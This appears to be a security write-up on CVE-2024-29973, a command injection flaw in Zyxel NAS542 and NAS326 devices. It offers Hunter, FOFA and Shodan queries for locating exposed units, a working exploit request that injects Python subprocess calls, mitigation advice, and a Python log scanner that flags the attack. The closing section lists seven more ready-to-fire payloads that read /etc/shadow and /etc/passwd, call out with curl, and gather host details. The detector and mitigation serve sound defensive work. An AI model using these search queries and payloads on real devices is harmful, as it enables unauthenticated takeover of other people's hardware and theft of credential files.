CVE-2024-29973 is a critical vulnerability found in certain Zyxel networking devices. This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the target device by exploiting improper input validation mechanisms in the firmware. Attackers can send specially crafted HTTP requests to the device, injecting system-level commands and potentially gaining full control over the device.
Hunter: product.name="ZyXEL NAS542" || product.name="ZyXEL NAS326"
FOFA: app="NAS542" || app="ZYXEL-NAS326"
SHODAN: http.title:"Zyxel NAS326"
Command Injection: The vulnerability arises due to insufficient input sanitization in one of the device's web interfaces. This flaw allows attackers to append operating system commands within parameters of HTTP requests.
Exploit Example: Attackers can inject commands through an HTTP GET request, like the one below, to execute arbitrary code:
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
Impact: Successful exploitation results in the ability to execute system commands, potentially leading to remote control over the device, data leakage, or further compromise of the network.
To mitigate the risks associated with this vulnerability, follow these steps:
Firmware Update: Ensure that all Zyxel devices are updated to the latest firmware version. Zyxel has released patches that address this vulnerability. Regularly check for updates and apply them promptly.
Network Segmentation: Isolate vulnerable devices from critical network infrastructure. Only expose necessary services and ensure administrative interfaces are not publicly accessible.
Firewall Configuration: Restrict incoming and outgoing traffic to essential services only. Block unnecessary HTTP access to Zyxel devices.
Monitor for Suspicious Activity: Implement logging and monitoring tools that can detect and alert on unusual behavior, such as repeated login attempts or abnormal traffic patterns.
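A log-side check for the request pattern shown above, added here as a defensive example (not code from the original page or from Zyxel): it parses combined-format access log lines (the sample lines are constructed) and flags requests to the setCookie endpoint whose c0 parameter carries the Python/subprocess injection markers. The marker list and the severity labels are assumptions chosen for this example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint taken from the exploit request on this page.
VULN_PATH = "/cmd,/simZysh/register_main/setCookie"
# Strings that appear in the injected Python payload (assumed marker list).
INJECTION_MARKERS = ("__import__", "subprocess", "check_output", "os.system", "eval(")

# Minimal combined-log-format parser: source, timestamp, method, target, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify_request(target: str) -> Optional[dict]:
    """Return a finding for requests to the vulnerable endpoint, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith(VULN_PATH):
        return None
    # parse_qs decodes '+' to space and '%23' to '#', so the payload is inspected
    # as the device would see it, not in its URL-encoded form.
    c0 = parse_qs(parts.query, keep_blank_values=True).get("c0", [""])[0]
    decoded_query = unquote_plus(parts.query)
    markers = [m for m in INJECTION_MARKERS if m in decoded_query]
    return {
        "path": parts.path,
        "c0": c0,
        "markers": markers,
        "severity": "high" if markers else "low",  # low = endpoint hit, no payload
    }

def scan_log(lines):
    """Run classify_request over raw log lines and attach source/time/status."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(src=m.group("src"), ts=m.group("ts"), status=m.group("status"))
            findings.append(finding)
    return findings

# Constructed sample: one benign request, one exploit attempt, one plain call to the endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:10:15:01 +0000] "GET / HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jun/2024:10:15:02 +0000] "GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1" 200 84',
    '198.51.100.4 - - [10/Jun/2024:10:16:30 +0000] "GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+sda1 HTTP/1.1" 200 310',
]
```

Run `scan_log(SAMPLE_LOG)` to get one high-severity finding (decoded payload, source address, timestamp) and one low-severity endpoint hit; feed real access logs the same way to alert on exploitation attempts.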
References: National Vulnerability Database - CVE-2024-29973; Zyxel Security Advisory
Further Exploit Examples (same injection point, different commands):
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1